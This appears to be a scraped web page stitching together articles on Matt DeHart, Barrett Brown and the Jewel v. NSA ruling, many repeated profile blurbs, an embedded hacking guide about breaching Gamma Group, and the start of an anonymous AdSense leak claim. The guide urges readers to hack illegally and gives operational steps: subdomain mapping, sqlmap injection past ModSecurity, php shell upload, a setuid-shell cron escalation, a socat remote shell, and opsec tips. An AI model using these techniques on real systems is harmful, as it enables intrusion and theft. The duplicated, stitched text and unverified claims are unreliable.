The case of Matt DeHart, a former U.S. drone pilot turned hacktivist, is as strange as it is disturbing. The 29-year-old was recently denied asylum in Canada, having fled there with his family after — he claims — he was drugged and tortured by agents of the FBI, who accused him of espionage and child pornography.
Prosecutors have shown they’re willing to say anything to convict a hacktivist, even if it means lying
Last week the Canadian Border Services Agency said he will be deported to the U.S. to stand trial “in very short order,” after a Canadian Immigration and Refugee Board ruling earlier this month denying his request for refugee status. He is being denied access to two thumb drives that he says contain evidence of illegal acts perpetrated by a U.S. government agency. Now after three unsuccessful attempts to gain political asylum, he fears that he and the files will be delivered to the very government he sought to escape.
“I cannot imagine any life in a country which has already tortured me,” Matt DeHart told reporter Adrian Humphreys, whose astonishing five-part series in Canada’s National Postdocuments the bizarre case. “Am I now to be given into the hands of my torturers?”
It’s tempting to dismiss DeHart’s claims based on their sheer outlandishness and his equally outlandish attempts to defect to Russia and Venezuela, which he now says he regrets. But given President Barack Obama’s administration’s penchant for punishing hacktivists and whistleblowers, a disturbing decades-long trend of prosecutorial misconduct and the now established fact that the U.S. has, as Obama put it, “tortured some folks,” it’s clear that the U.S. government’s claims in this case warrant even more skepticism.
Matt DeHart
According to government documents, Matt DeHart admitted during an interrogation to becoming involved with a spy ring during his time as a drone pilot, agreeing to broker the sale of military secrets for up to $100,000 per month through a Russian agent in Canada. But he claims he was being drugged and tortured and simply made the story up.
“I would have told them anything,” he told The National Post of his encounter with the FBI agents, during which he was denied a lawyer. “Information that is derived from torture — to use it against somebody is ridiculous. It’s garbage. I already said it’s not true.”
He testified that the agents admitted the child porn charges were fabricated — a ruse to enable investigation into his involvement with the nebulous hacktivist collective Anonymous. He says the investigation stems from a file he uploaded twice to a hidden website, hosted on the anonymous Tor network from a server in his parents’ house. DeHart claims it contained evidence of government wrongdoing, “an FBI investigation into the [CIA’s] practices.” Screen shots of the WikiLeaks website found on his computer suggest he intended to send the file to the whistleblowing organization.
After the asylum ruling earlier this month, three courts — two in the U.S. and one in Canada — have expressed strong doubts about the child pornography charges that triggered a search warrant onMatt DeHart’s parents’ home in the U.S. Those accusations date to 2008 and stemmed from his association with two teenagers while playing the online game “World of Warcraft,” one of whom was also involved with Anonymous; the charges were ultimately not proved.
After DeHart was arrested while crossing from Canada to the U.S. in 2010, a judge in Bangor, Maine, found it odd that prosecutors were suddenly citing the two-year-old porn accusations and that police hadn’t analyzed Matt DeHart computers for illicit files seven months after they were seized. A judge in Tennessee, where Matt DeHart ‘s family lived before moving to Canada, admitted that “the weight of the evidence is not as firm as I thought it was.” And most recently, the Canadian Immigration and Refugee Board concluded there was “no credible or trustworthy evidence” that DeHart had solicited child porn.
Prosecutorial misconduct helps the government railroad journalists, whistleblowers, hacktivists and any who dare to speak truth to power.
To be sure, Matt DeHart strange behavior throughout this ordeal doesn’t place him in a particularly flattering light. But it’s worth noting that these kinds of serious accusations are often made in cases against hacktivists and whistleblowers, helping place them in the government’s crosshairs and paint them as nefarious even when the accusations are easily disproved.
Barrett Brown, a journalist who investigated links between the U.S. government and private intelligence contractors, had all manner of ridiculous false accusations thrown at him before being sentenced last month to five and a half years in prison. He was initially charged for the innocuous act of copying and pasting a hyperlink to a public file stolen by Anonymous from one chat room into another. The charge was dropped, but the linking was still used to increase the length of his sentence, despite the fact that prosecutors had no evidence Brown had looked at the file or even known what was in it.
At one point, prosecutors claimed that Brown conspired with members of Anonymous to overthrow the U.S. government. They also accused him of participating in “SWATting,” the practice of making fake 911 calls to harass people in their homes, and even of plotting with another journalist to hack the Bahraini government. Not one of these claims was supported by the voluminous collection of chat logs that the government provided as evidence. Nor did additional logs obtained by The Daily Dot, which the prosecution had withheld under seal.
Brown was not entirely without fault in the case, having obstructed a search warrant and posted a YouTube video threatening an FBI agent in response to the seizure of his laptops. But in retrospect, it seems clear the impetus for the case was that the government saw Brown’s investigations as a threat and would say anything to guarantee his conviction, even if that meant knowingly making false statements. As Brown put it during his allocution, “This is not the rule of law … It is the rule of law enforcement.”
Close scrutiny
What can we expect from the Matt DeHart case if this is the prosecutorial legacy it follows?
As The New York Times editorial board recently noted, defendants have no recourse when police and prosecutors lie, cheat and conceal evidence in the courtroom, leading to what one federal judge has described (PDF) as a national epidemic of prosecutorial misconduct. Sometimes it leads to wrongful convictions. Other times, as in Brown’s case, it helps the government railroad journalists, whistleblowers, hacktivists and any who dare to speak truth to power.
Remember Aaron Swartz, an information activist who prosecutors pursued vigorously for the act of downloading too many academic articles from an MIT library? Much like in Brown’s case, prosecutors were accused of withholding evidence and coercing Swartz into taking a guilty plea. Swartz committed suicide in 2013 amid mounting legal costs and the possibility of up to 35 years in prison, triggering the DeHarts’ decision to flee the country.
“Aaron Swartz had very similar psychological makeup, similar age, same circumstances as Matt DeHart,” DeHart’s father, Paul DeHart, a retired U.S. Air Force major, told The National Post. “I do not want to wake up one day and find my son hanging from a rope in the garage of our house. And I have noplace to go to bring this to anyone’s attention.”
With Matt DeHart’s attempted defections and other erratic behavior, it’s admittedly difficult to determine where his true intentions lie. But the government’s actions against him have been just as sketchy, if not more so. His claims must be taken seriously, and his case should be closely scrutinized, lest another potential whistleblower fall prey to the state’s merciless war on leaks.
by Joshua Kopstein, a cyberculture journalist and researcher from New York City. His work focuses on Internet law and disorder, surveillance and government secrecy.
NSA Spy Program A federal judge ruled in favor of the National Security Agency NSA Spy Program in a key surveillance case on Tuesday, dismissing a challenge which claimed the government’s spying operations were groundless and unconstitutional.
Filed in 2008 by the Electronic Frontier Foundation, the lawsuit, Jewel v. NSA, aimed to end the agency’s unwarranted surveillance of U.S. citizens, which the consumer advocacy group said violated the 4th Amendment.
The lawsuit also implicated AT&T in the operations, alleging that the phone company “routed copies of Internet traffic to a secret room in San Francisco controlled by the NSA.” That charge was based off of a 2006 document leak by former AT&T technician and whistleblower Mark Klein, who disclosed a collection program between the company and the NSA that sent AT&T user metadata to the intelligence agency.
US District Judge Jeffrey White on Tuesday denied a partial summary judgment motion to the EFF and granted a cross-motion to the government, dismissing the case without a trial. In his order, White said the plaintiff, Carolyn Jewel, an AT&T customer, was unable to prove she was being targeted for surveillance—and that if she could, “any possible defenses would require impermissible disclosure of state secret information.” NSA Spy Program
Offering his interpretation of the decision, EFF senior staff attorney David Greene explained in a blog post:
Agreeing with the government, the court found that the plaintiffs lacked “standing” to challenge the constitutionality of the program because they could not prove that the surveillance occurred as plaintiffs’ alleged. Despite the judge’s finding that he could not adjudicate the standing issue without “risking exceptionally grave damage to national security,” he expressed frustration that he could not fully explain his analysis and reasoning because of the state secrets issue.
The EFF later Tweeted:
NSA Internet surveillance is so secret, the court refused to even consider whether it’s constitutional.
Calling the ruling “frustrating,” Greene said the EFF “disagree[s] with the court’s decision and it will not be the last word on the constitutionality of the government’s mass surveillance of the communications of ordinary Americans.”Jewel v. NSA is the EFF’s longest-running case. Despite the decision, the EFF said it would not back down from its pursuit of justice and was careful to note that the ruling did not mean that the NSA’s operations were legal.
“Judge White’s ruling does not end our case. The judge’s ruling only concerned Upstream Internet surveillance, not the telephone records collection nor other mass surveillance processes that are also at issue in Jewel,” said Kurt Opsahl, deputy legal council at EFF. “We will continue to fight to end NSA mass surveillance.”
The issue is similar to the 2013 Supreme Court decision in Clapper v. Amnesty International, which found that plaintiffs who had reason to believe they were being spied on could not provide substantial proof of surveillance, and thus could not bring their case. NSA Spy Program
Jewel v. NSA stems from the EFF’s 2006 case, Hepting v. AT&T, which was dismissed in 2009 after Congress, including then-Senator Barack Obama, voted to give telecommunications companies immunity from such lawsuits.
“It would be a travesty of justice if our clients are denied their day in court over the ‘secrecy’ of a program that has been front-page news for nearly a decade,” Opsahl added.
Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.
Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.Edward Joseph “Ed” Snowden is an American computer professional who leaked classified information from the National Security Agency, starting in June 2013.
John Young Architect, Cryptologist, Leak Facilitator, Cryptome.org Founder
John Young is a wise, seasoned, and ‘angry’ citizen determined to expose corruption and abhorrent secrecy. He is currently living in New York, doing architectural work for some of the most powerful members of the political establishment that he has sworn to attack. “It’s an easy way to make money in New York, to do corrupt work,” he says with a shrug.
Young on .gov tactics:
“Assassination Politics,” is what Young described as “an imaginative and sophisticated prospective for improving governmental accountability by way of a scheme for anonymous, untraceable political assassination.”
Interesting, Young disclosed the fact on Cryptome in 2000:
“My father-in-law was a longtime career officer in the Central Intelligence Agency, one of its earliest members, and chief of station in several countries…. He’s not talking to Cryptome, and that’s regrettable, for I believe such knowledgeable persons should disclose everything they know about the global culture of secret intelligence and its profound effects – to better inform citizens on the true way their governments function.”
John Cusack Most recently, Hollywood actor John Cusack is the latest supporter to visit WikiLeaks founder Julian Assange in his continued stay at the Ecuadorian Embassy.
The American star joined US activist Daniel Ellsberg and Indian-born author and activist Arundhati Roy for a meeting inside the embassy in London.
Antiwar, 911 Truth, etc
John Cusack Most recently, Hollywood actor John Cusack is the latest supporter to visit WikiLeaks founder Julian Assange in his continued stay at the Ecuadorian Embassy.
The American star joined US activist Daniel Ellsberg and Indian-born author and activist Arundhati Roy for a meeting inside the embassy in London.
Antiwar, 911 Truth, etc
John Cusack Most recently, Hollywood actor John Cusack is the latest supporter to visit WikiLeaks founder Julian Assange in his continued stay at the Ecuadorian Embassy.
The American star joined US activist Daniel Ellsberg and Indian-born author and activist Arundhati Roy for a meeting inside the embassy in London.
Antiwar, 911 Truth, etc
John Cusack Most recently, Hollywood actor John Cusack is the latest supporter to visit WikiLeaks founder Julian Assange in his continued stay at the Ecuadorian Embassy.
The American star joined US activist Daniel Ellsberg and Indian-born author and activist Arundhati Roy for a meeting inside the embassy in London.
John Cusack Activist, Entertainer, Comedian
Antiwar, 911 Truth, etc
John Cusack Most recently, Hollywood actor John Cusack is the latest supporter to visit WikiLeaks founder Julian Assange in his continued stay at the Ecuadorian Embassy.
The American star joined US activist Daniel Ellsberg and Indian-born author and activist Arundhati Roy for a meeting inside the embassy in London.
Antiwar, 911 Truth, etc
John Cusack Most recently, Hollywood actor John Cusack is the latest supporter to visit WikiLeaks founder Julian Assange in his continued stay at the Ecuadorian Embassy.
The American star joined US activist Daniel Ellsberg and Indian-born author and activist Arundhati Roy for a meeting inside the embassy in London.
Antiwar, 911 Truth, etc
John Cusack Most recently, Hollywood actor John Cusack is the latest supporter to visit WikiLeaks founder Julian Assange in his continued stay at the Ecuadorian Embassy.
The American star joined US activist Daniel Ellsberg and Indian-born author and activist Arundhati Roy for a meeting inside the embassy in London.
Antiwar, 911 Truth, etc
John Cusack Most recently, Hollywood actor John Cusack is the latest supporter to visit WikiLeaks founder Julian Assange in his continued stay at the Ecuadorian Embassy.
The American star joined US activist Daniel Ellsberg and Indian-born author and activist Arundhati Roy for a meeting inside the embassy in London.
Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.
Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.Daniel Ellsberg is an activist and former United States military analyst who, while employed by the RAND Corporation, precipitated a national political controversy in 1971 when he released the Pentagon Papers.
I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you’ve learned the basics you’ll realize this
really is easier than filing a FOIA request.
–[ 2 ]– Staying Safe
This is illegal, so you’ll need to take same basic precautions:
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it’s better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
here.
As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.
NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you’ll want a public IP address to
receive connect back shells. I recommend using servers you’ve hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you’re running will
have a nice fast connection to your target.
–[ 3 ]– Mapping out the target
Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.
[0] http://ha.ckers.org/fierce/
For an example let’s take Blackwater. We start out knowing their homepage is at
academi.com. Running fierce.pl -dns academi.com we find the subdomains:
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com
Now we do whois lookups and find the homepage of www.academi.com is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: 67.238.84.224 – 67.238.84.255
CIDR: 67.238.84.224/27
CustName: Blackwater USA
Address: 850 Puddin Ridge Rd
Doing a whois lookup on academi.com reveals it’s also registered to the same
address, so we’ll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
“850 Puddin Ridge Rd” inurl:ip-address-lookup
“850 Puddin Ridge Rd” inurl:domaintools
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you’ve found everything.
Also just google the organization and browse around its websites. For example on
academi.com we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com
If you repeat the whois lookups and such you’ll find academiproshop.com seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.
In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
was simply a whois lookup of finfisher.com which found it registered to the name
“FinFisher GmbH”. Googling for:
“FinFisher GmbH” inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com
…so now you’ve got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.
–[ 4 ]– Scanning & Exploiting
Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.
Now for each service you find running:
1) Is it exposing something it shouldn’t? Sometimes companies will have services
running that require no authentication and just assume it’s safe because the url
or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.
2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
default password.
3) Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:
1) Browse them. Especially on subdomains that fierce finds which aren’t intended
for public viewing like test.company.com or dev.company.com you’ll often find
interesting stuff just by looking at them.
2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.
3) Identify what software is being used on the website. WhatWeb is useful [1]
4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].
First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it’s time to move
on to finding a new vulnerability:
5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.
6) For the non-custom software they’re running, get a copy to look at. If it’s
free software you can just download it. If it’s proprietary you can usually
pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that’s easier to hack, and get a copy from them.
* Visit the website. See nothing but a login page. Quickly check for sqli in the
login form.
* See if WhatWeb knows anything about what software the site is running.
* WhatWeb doesn’t recognize it, so the next question I want answered is if this
is a custom website by Gamma, or if there are other websites using the same
software.
* I view the page source to find a URL I can search on (index.php isn’t
exactly unique to this software). I pick Scripts/scripts.js.php, and google:
allinurl:”Scripts/scripts.js.php”
* I find there’s a handful of other sites using the same software, all coded by
the same small webdesign firm. It looks like each site is custom coded but
they share a lot of code. So I hack a couple of them to get a collection of
code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum
up views: “In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group…”
But it’s really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:
* google allinurl:”Scripts/scripts.js.php” and find the other sites
* Notice they’re all sql injectable in the first url parameter I try.
* Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
the option –tamper=’tamper/modsecurityversioned.py’
* Acquire the admin login information, login and upload a php shell [1] (the
check for allowable file extensions was done client side in javascript), and
download the website’s source code.
Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
javascript, and if you’re unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.
[0] http://www.dvwa.co.uk/
Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
sqli (it’s nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to:
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it’s
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can’t use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap –file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.
Looking through the source, I see customers can attach a file to their support
tickets, and there’s no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I’m in!
finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer
so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
wait an hour, and ….nothing. Turns out that while the cron process is running
it doesn’t seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn’t update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that’s probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn’t get much of anything new, so I move
on to the rest of the network.
–[ 6 ]– Pivoting
The next step is to look around the local network of the box you hacked. This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.
The only interesting thing I could get on finsupport’s local network was another
webserver serving up a folder called ‘qateam’ containing their mobile malware.
–[ 7 ]– Have Fun
Once you’re in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there’s no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make due with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
already so I can move on to step 2!
–[ 8 ]– Other Methods
The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There’s no one right way, and any method that works is as good as
any other. The other main ways that I’ll state without going into detail are:
1) Exploits in web browers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don’t
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There’s also
metasploit browser autopwn, but you’ll probably have better luck with no
exploits and a fake flash updater prompt.
2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: “Social Engineering”. This is probably the way to go if you don’t know
too much about computers, and it really is all it takes to be a successful
hacker [0].
[0] https://www.youtube.com/watch?v=DB6ywr9fngU
–[ 9 ]– Resources
Links:
* https://www.pentesterlab.com/exercises/
* http://overthewire.org/wargames/
* http://www.hackthissite.org/
* http://smashthestack.org/
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
* http://www.phrack.com/
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
(all his other blog posts are great too)
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
One trick it leaves out is that on most systems the apache access log is
readable only by root, but you can still include from /proc/self/fd/10 or
whatever fd apache opened it as. It would also be more useful if it mentioned
what versions of php the various tricks were fixed in.
* http://www.dest-unreach.org/socat/
Get usable reverse shells with a statically linked copy of socat to drop on
your target and:
target$ socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
It’s also useful for setting up weird pivots and all kinds of other stuff.
Books:
* The Web Application Hacker’s Handbook
* Hacking: The Art of Exploitation
* The Database Hacker’s Handbook
* The Art of Software Security Assessment
* A Bug Hunter’s Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated
Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.
–[ 10 ]– Outro
You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
customers are targeting and with what purpose that makes them evil. That’s not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it’s cheaper to attack than to defend it’s harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.
Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!
Max Maverick breaks down everything we know, don’t know, and should be asking about this mainstream media ‘circus’ that has become of the Snowden NSA Leak Disclosure.
Bruce SchneierThe NSA: Capabilities and Countermeasures
Speaker: Bruce Schneier
Edward Snowden has given us an unprecedented window into the NSA’s surveillance activities. Drawing from both the Snowden documents and revelations from previous whistleblowers, I will describe the sorts of surveillance the NSA does and how it does it. The emphasis is on the technical capabilities of the NSA, not the politics of their actions. This includes how it conducts Internet surveillance on the backbone, but is primarily focused on their offensive capabilities: packet injection attacks from the Internet backbone, exploits against endpoint computers and implants to exfiltrate information, fingerprinting computers through cookies and other means, and so on.
I will then talk about what sorts of countermeasures are likely to frustrate the NSA. Basically, these are techniques to raise the cost of wholesale surveillance in favor of targeted surveillance: encryption, target hardening, dispersal, and so on.
I am a former Google employee and I am writing this to leak information to the public of what I
witnessed and took part in while being an employee. My position was to deal with AdSense accounts,
more specifically the accounts of publishers (not advertisers). I was employed at Google for a period of
several years in this capacity.
Having signed many documents such as NDA’s and non-competes, there are many repercussions for me,
especially in the form of legal retribution from Google. I have carefully planned this leak to coincide with
certain factors in Google such as waiting for the appropriate employee turn around so that my identity
could not be discovered.
To sum it up for everyone, I took part in what I (and many others) would consider theft of money from
the publishers by Google, and from direct orders of management. There were many AdSense employees
involved, and it spanned many years, and I hear it still is happening today except on a much wider scale.
No one on the outside knows it, if they did, the FBI and possibly IRS would immediately launch an
investigation, because what they are doing is so inherently illegal and they are flying completely under
the radar.
It began in 2009. Everything was perfectly fine prior to 2009, and in fact it couldn’t be more perfect from
an AdSense employees perspective, but something changed.
Google Bans and Ban Criteria
Before December 2012:
In the first quarter of 2009 there was a “sit-down” from the AdSense division higher ups to talk about
new emerging issues and the role we (the employees in the AdSense division needed to play. It was a
very long meeting, and it was very detailed and intense. What it boiled down to was that Google had
suffered some very serious losses in the financial department several months earlier. They kept saying
how we “needed to tighten the belts” and they didn’t want it to come from Google employees pockets.
So they were going to (in their words) “carry out extreme quality control on AdSense publishers”. When
one of my fellow co-workers asked what they meant by that. Their response was that AdSense itself
hands out too many checks each month to publishers, and that the checks were too large and that
needed to end right away. Many of the employees were not pleased about this (like myself). But they
were successful in scaring the rest into thinking it would be their jobs and their money that would be on
the line if they didn’t participate. The meeting left many confused as to how this was going to happen.
What did they mean by extreme quality control? A few other smaller meetings occur with certain key
